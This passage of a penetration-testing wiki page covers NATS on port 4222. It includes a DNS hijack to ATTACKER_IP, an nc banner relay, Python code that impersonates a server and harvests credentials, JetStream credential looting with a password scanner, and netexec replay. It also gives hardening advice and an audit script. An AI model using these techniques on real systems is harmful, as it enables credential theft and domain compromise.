---
title: "4222 - Nats"
weight: 4222
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **Study note**: This page covers penetration-testing techniques for **4222 - NATS** and is aimed at both information-security beginners and practitioners.

⚠️ **Legal notice**: This page is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.

---

> update add nats-svc.domain.local 60 A ATTACKER_IP
> send
```

+ Mirror the legitimate banner once, then replay it to every connecting client. A NATS client trusts the first `INFO` line it receives, so piping the real server's banner through a listener is all that is needed:

```bash
# fetch the genuine INFO line from the real server and serve it to the next
# client that connects to the hijacked name (one connection per run)
nc REAL_NATS 4222 | head -1 | nc -lnvp 4222
```

+ As soon as an internal client resolves the hijacked name, it emits a plaintext `CONNECT` frame containing the `user` / `pass` pair (or an `auth_token`) together with telemetry (client name, language and library version, protocol level). Nothing beyond the `INFO` banner is required to get this far, so `nc` alone is enough to harvest secrets. Two caveats: if the mirrored banner advertises `"tls_required":true`, a conforming client starts a TLS handshake instead of sending `CONNECT` in the clear, and clients that authenticate with NKeys or JWT `creds` send a signature over the server's nonce rather than a reusable password.
+ For longer engagements, run the official server locally (`git clone https://github.com/nats-io/nats-server && go build && ./nats-server -V`). Trace logging (`-V`) already prints the username from each `CONNECT`; the server redacts the password in the trace output, so either patch out that redaction in your local build or capture the traffic with Wireshark to see the full password.
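The `INFO`/`CONNECT` exchange the two bullets above rely on, as an added example in Python (not code from the original page or from the nats-server project): a fake server that replays a banner and captures the `CONNECT` frame, with a constructed client standing in for the internal service. The `server_id`, client name and credentials are made up for the demo; on an engagement you would replay the real banner fetched from `REAL_NATS` and bind on the hijacked address instead of loopback.

```python
# Added example (not from the original page or the nats-server project): a
# minimal NATS impostor that replays an INFO banner and captures the CONNECT
# frame a password-authenticating client answers with. The server_id, client
# name and credentials below are constructed for the demo.
import json
import socket
import threading
from typing import Dict

INFO_TEMPLATE: Dict = {
    "server_id": "NCFAKE0000",   # constructed; a real run replays the genuine banner
    "version": "2.10.0",
    "go": "go1.21",
    "host": "0.0.0.0",
    "port": 4222,
    "headers": True,
    "max_payload": 1048576,
    "proto": 1,
    "auth_required": True,
    "tls_required": False,
}


def build_info(fields: Dict) -> bytes:
    """Wire form of the banner: 'INFO {json}\\r\\n'."""
    return b"INFO " + json.dumps(fields).encode() + b"\r\n"


def parse_connect(frame: bytes) -> Dict:
    """Return the JSON payload of a CONNECT frame, or {} for anything else."""
    if not frame.upper().startswith(b"CONNECT "):
        return {}
    try:
        return json.loads(frame[8:].strip())
    except json.JSONDecodeError:
        return {}


def _read_line(sock: socket.socket) -> bytes:
    """Read up to the first CRLF; returns what was received if the peer closes early."""
    buf = b""
    while b"\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.split(b"\r\n", 1)[0]


def listen_on(port: int = 0) -> socket.socket:
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))   # bind the hijacked address on an engagement box
    srv.listen(1)
    return srv


def harvest_once(srv: socket.socket, info: Dict) -> Dict:
    """Accept one client, send INFO, return whatever CONNECT payload it sends.

    If the banner carries "tls_required": true, a conforming client starts a
    TLS handshake instead of sending CONNECT in the clear; the first line we
    read is then not a CONNECT frame and the result is {}.
    """
    conn, _ = srv.accept()
    with srv, conn:
        conn.sendall(build_info(info))
        return parse_connect(_read_line(conn))


def fake_client(port: int, user: str, password: str) -> None:
    """Constructed stand-in for an internal client using user/pass auth."""
    with socket.create_connection(("127.0.0.1", port)) as c:
        info = json.loads(_read_line(c)[5:])   # strip the leading 'INFO '
        if info.get("tls_required"):
            return                              # a real client would begin TLS here
        connect = {"verbose": False, "pedantic": False, "user": user, "pass": password,
                   "name": "billing-worker", "lang": "go", "version": "1.30.0", "protocol": 1}
        c.sendall(b"CONNECT " + json.dumps(connect).encode() + b"\r\nPING\r\n")


def demo(tls_required: bool = False) -> Dict:
    """Run impostor and client in-process; returns the harvested CONNECT payload."""
    srv = listen_on()
    port = srv.getsockname()[1]
    info = dict(INFO_TEMPLATE, tls_required=tls_required)
    result: Dict = {}
    t = threading.Thread(target=lambda: result.update(harvest_once(srv, info)))
    t.start()
    fake_client(port, "Dev_Account_A", "hx5h7F5554fP@1337!")
    t.join(5)
    return result


if __name__ == "__main__":
    creds = demo()
    print(f"harvested user={creds.get('user')} pass={creds.get('pass')} name={creds.get('name')}")
```

`demo(tls_required=True)` returns an empty dict: with that flag in the banner the client never sends `CONNECT` in the clear, which is why replaying the genuine banner matters and why a TLS-only server defeats this trick.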

### JetStream looting & password hunting

Once any credential is recovered (e.g. `Dev_Account_A`), store it as a CLI context to avoid retyping:

```bash
nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
```

JetStream discovery usually follows this pattern:

```bash
nats account info --context mirage      # quotas, stream count, expiration
nats stream list --context mirage       # names + message totals
nats stream info auth_logs --context mirage
nats stream view auth_logs --context mirage
```

Streaming teams frequently log authentication events into subjects such as `logs.auth`. If developers persist the raw JSON into a JetStream stream, the payloads may include plaintext AD usernames and passwords:

```json
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
```

Retained secrets can then be replayed against services that accept Kerberos, e.g. `netexec smb DC01 -u USER -p PASS -k`, which is frequently the foothold for wider domain compromise.
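Hunting through retained messages by eye does not scale once a stream holds thousands of events, so here is an added example in Python (not code from the original page) that scans a list of payload strings, such as the lines `nats stream view` prints, for username/password pairs. It handles nested JSON, `key=value` log lines and redacted values; the messages in `SAMPLE_PAYLOADS` are constructed for the demo.

```python
# Added example (not from the original page): scan retained JetStream payloads
# for username/password pairs. Handles nested JSON, key=value log lines and
# redacted values. SAMPLE_PAYLOADS is constructed for the demo.
import json
import re
from typing import Dict, List, Optional, Tuple

USER_KEYS = ("user", "username", "samaccountname", "login", "account")
PASS_KEYS = ("password", "pass", "passwd", "pwd", "secret")
# key=value or key: value pairs in free-text log lines, optionally double-quoted
KV_RE = re.compile(
    r"(?i)\b(user(?:name)?|login|account|pass(?:word|wd)?|pwd|secret)\s*[=:]\s*\"?([^\s,;\"]+)"
)

SAMPLE_PAYLOADS = [  # constructed messages, as if dumped from an auth_logs stream
    '{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}',
    '{"event":"login","detail":{"samAccountName":"svc_backup","passwd":"Winter2024!"},"ip":"10.10.10.5"}',
    'ts=2024-05-01T09:12:03Z level=info msg="ldap bind" user=jdoe pass=********',
    'auth ok login=mark.t password=Spring#99 ip=10.10.10.31',
    'PING',
    '{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.21"}',
]


def _flatten(obj, out: Dict[str, str]) -> None:
    """Collect lower-cased key -> value pairs from arbitrarily nested JSON."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            if isinstance(v, (dict, list)):
                _flatten(v, out)
            else:
                out.setdefault(k.lower(), str(v))
    elif isinstance(obj, list):
        for item in obj:
            _flatten(item, out)


def _redacted(value: str) -> bool:
    """True for empty, starred-out or explicitly masked values."""
    return not value or set(value) <= {"*"} or value.strip("[]<>").lower() in {"redacted", "hidden", "masked"}


def extract_credential(payload: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) if the message carries a usable pair, else None."""
    fields: Dict[str, str] = {}
    try:
        _flatten(json.loads(payload), fields)
    except (json.JSONDecodeError, TypeError):
        for key, value in KV_RE.findall(payload):
            fields.setdefault(key.lower(), value)
    user = next((fields[k] for k in USER_KEYS if k in fields), None)
    password = next((fields[k] for k in PASS_KEYS if k in fields), None)
    if user is None or password is None or _redacted(password):
        return None
    return user, password


def find_credentials(payloads: List[str]) -> List[Tuple[str, str]]:
    """Unique (user, password) pairs in first-seen order."""
    seen, found = set(), []
    for payload in payloads:
        cred = extract_credential(payload)
        if cred and cred not in seen:
            seen.add(cred)
            found.append(cred)
    return found


if __name__ == "__main__":
    for user, password in find_credentials(SAMPLE_PAYLOADS):
        print(f"{user}:{password}")
```

Feed it the stream dump line by line (for example `nats stream view auth_logs --context mirage` piped to a file) and pass the lines as `payloads`; starred-out passwords such as the `jdoe` line are dropped rather than reported as hits.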

### Hardening & detection

* **Enforce TLS** with a `tls { ... }` block on the server; `verify: true` in that block additionally requires client certificates (mutual TLS). Without encryption, the `INFO`/`CONNECT` exchange hands credentials to anyone on-path. Replacing user/password with NKey or JWT (`creds` file) authentication further means a captured `CONNECT` carries only a signature over a one-time nonce, not a reusable secret.
* **Pinpoint who can update DNS**. Delegate service records to dedicated accounts, audit DNS Server Event IDs 257/252 for high-value hostnames, and alert on scavenging so a removed broker record cannot be silently re-claimed by an attacker.
* **Stop logging credentials**. Scrub secrets before publishing to subjects and set JetStream retention and age limits (`max_age`, `max_msgs`) so anything that slips through expires; note that `deny_delete`/`deny_purge` lock a stream's history in place, so apply them only where operators actually want old messages to be unremovable.
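A quick way to check the first bullet from the network side, as an added example in Python (not code from the original page or from the nats-server project): read the `INFO` banner a server sends to every new connection and flag the settings that make the banner/`CONNECT` leak possible. The host name is constructed; the finding codes are this script's own.

```python
# Added example (not from the original page or the nats-server project): read
# the INFO banner a NATS server sends on connect and flag weak settings. The
# host name is constructed; the finding codes are this script's own.
import json
import socket
from typing import Dict, List

FINDINGS = {
    "PLAINTEXT": "server neither offers nor requires TLS: INFO and CONNECT travel in the clear",
    "TLS_OPTIONAL": "TLS is offered but not required: an impostor banner can downgrade clients",
    "NO_AUTH": "auth_required is false: anyone reaching the port can publish and subscribe",
    "PASSWORD_AUTH": "no nonce in INFO, so auth is user/pass or token: a captured CONNECT is replayable",
}


def fetch_info(host: str, port: int = 4222, timeout: float = 5.0) -> Dict:
    """Return the parsed INFO banner. No credentials are needed for this."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        buf = b""
        try:
            while b"\r\n" not in buf:
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            # A server with tls { handshake_first: true } sends nothing until it
            # sees a ClientHello, so silence means TLS-first, not a dead port.
            if not buf:
                return {"tls_required": True, "tls_handshake_first": True}
            raise
    line = buf.split(b"\r\n", 1)[0]
    if not line.startswith(b"INFO "):
        raise ValueError(f"unexpected banner: {line[:40]!r}")
    return json.loads(line[5:])


def assess_info(info: Dict) -> List[str]:
    """Map banner fields to finding codes (fixed order so output diffs cleanly)."""
    if info.get("tls_handshake_first"):
        return []   # auth settings are only visible after the TLS handshake
    findings: List[str] = []
    if not info.get("tls_required"):
        findings.append("TLS_OPTIONAL" if info.get("tls_available") else "PLAINTEXT")
    if not info.get("auth_required"):
        findings.append("NO_AUTH")
    elif "nonce" not in info:
        # nats-server only puts a nonce in INFO when NKey/JWT auth is configured
        findings.append("PASSWORD_AUTH")
    return findings


def report(host: str, port: int = 4222) -> List[str]:
    info = fetch_info(host, port)
    codes = assess_info(info)
    for code in codes:
        print(f"[{code}] {host}:{port} {FINDINGS[code]}")
    if not codes:
        print(f"[OK] {host}:{port} version {info.get('version', '?')} requires TLS and non-password auth")
    return codes


if __name__ == "__main__":
    report("nats-svc.domain.local")   # constructed host from the DNS scenario above
```

Run it against each broker hostname that the DNS delegation covers; `PLAINTEXT` or `TLS_OPTIONAL` together with `PASSWORD_AUTH` is the combination the harvesting technique above depends on.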

---


### Search engine syntax

#### FOFA

```bash
# FOFA search syntax
port="4222"
```

#### Shodan

```bash
# Shodan search syntax
port:4222
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:4222
```

---

## 📖 References

- [HackTricks - 4222-nats](https://book.hacktricks.wiki/en/network-services-pentesting/4222-nats.html)

